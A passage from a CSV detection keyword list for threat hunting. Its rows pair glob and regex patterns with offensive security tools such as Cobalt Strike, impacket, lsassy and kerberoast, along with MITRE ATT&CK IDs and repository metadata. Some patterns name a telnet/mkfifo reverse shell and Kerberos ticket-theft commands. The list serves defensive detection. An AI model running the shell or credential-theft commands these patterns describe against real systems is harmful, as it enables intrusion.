Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*test.endpoint.rapid7.com*",".{0,1000}test\.endpoint\.rapid7\.com.{0,1000}","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*test_beef_debugs_spec*",".{0,1000}test_beef_debugs_spec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*test_ccache_fromKirbi*",".{0,1000}test_ccache_fromKirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*test_crawler.py*",".{0,1000}test_crawler\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*test_invoke_bof.x64.o*",".{0,1000}test_invoke_bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*test_litefuzz.py*",".{0,1000}test_litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*test_lsassy.*",".{0,1000}test_lsassy\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*test_mitm_initialization.py*",".{0,1000}test_mitm_initialization\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*test_nanodump_exe*",".{0,1000}test_nanodump_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*test_pacu_update.py*",".{0,1000}test_pacu_update\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*test_tezos2john.py*",".{0,1000}test_tezos2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*TestConsoleApp_YSONET*",".{0,1000}TestConsoleApp_YSONET.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*Test-ContainsAmsiPSTokenSignatures -*",".{0,1000}Test\-ContainsAmsiPSTokenSignatures\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Test-DllExists*",".{0,1000}Test\-DllExists.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Test-DllExists*",".{0,1000}Test\-DllExists.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*tester@egress-assess.com*",".{0,1000}tester\@egress\-assess\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*testHeapOverflow.*",".{0,1000}testHeapOverflow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Test-HijackableDll*",".{0,1000}Test\-HijackableDll.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*testing for SQL injection on (custom)*",".{0,1000}testing\sfor\sSQL\sinjection\son\s\(custom\).{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*testing* testing* 1* 2* 3 *",".{0,1000}testing.{0,1000}\stesting.{0,1000}\s1.{0,1000}\s2.{0,1000}\s3\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*test-iodine.log*",".{0,1000}test\-iodine\.log.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*TestMyPrivs.ps1*",".{0,1000}TestMyPrivs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Test-PasswordQuality -WeakPasswordHashesSortedFile *",".{0,1000}Test\-PasswordQuality\s\-WeakPasswordHashesSortedFile\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Tests communications to all of the known DNS-over-HTTPS communications providers*",".{0,1000}Tests\scommunications\sto\sall\sof\sthe\sknown\sDNS\-over\-HTTPS\scommunications\sproviders.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*TestWinRMMachines*",".{0,1000}TestWinRMMachines.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*tevora-threat/SharpView/*",".{0,1000}tevora\-threat\/SharpView\/.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*text_to_shellcode\*.exe*",".{0,1000}text_to_shellcode\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*TexttoExe.ps1*",".{0,1000}TexttoExe\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*tezos2john.py*",".{0,1000}tezos2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*TF=*mkfifo * && telnet * 0<*| /bin/sh 1>*",".{0,1000}TF\=.{0,1000}mkfifo\s.{0,1000}\s\&\&\stelnet\s.{0,1000}\s0\<.{0,1000}\|\s\/bin\/sh\s1\>.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*tgs::ask /tgt:*",".{0,1000}tgs\:\:ask\s\/tgt\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*tgscrack.go*",".{0,1000}tgscrack\.go.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*tgsrepcrack.*",".{0,1000}tgsrepcrack\..{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tgsrepcrack.py*",".{0,1000}tgsrepcrack\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*TGSThief-main*",".{0,1000}TGSThief\-main.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*TGT_backdoor_svc*",".{0,1000}TGT_backdoor_svc.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*TGT_Monitor.ps1*",".{0,1000}TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*tgtdeleg /nowrap*",".{0,1000}tgtdeleg\s\/nowrap.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*tgtdelegation *",".{0,1000}tgtdelegation\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*tgtdelegation.cna*",".{0,1000}tgtdelegation\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*tgtdelegation.x64*",".{0,1000}tgtdelegation\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*tgtdelegation.x86*",".{0,1000}tgtdelegation\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*tgtParse.py *",".{0,1000}tgtParse\.py\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*th3rd/heroinn*",".{0,1000}th3rd\/heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*TH3xACE/EDR-Test*",".{0,1000}TH3xACE\/EDR\-Test.{0,1000}","offensive_tool_keyword","EDR-Test","Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/EDR-Test","1","1","N/A","N/A","2","142","19","2023-03-27T11:39:32Z","2022-03-27T08:58:49Z" "*Thank you for using ADeleginator. Godspeed! :O*",".{0,1000}Thank\syou\sfor\susing\sADeleginator\.\sGodspeed!\s\:O.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active 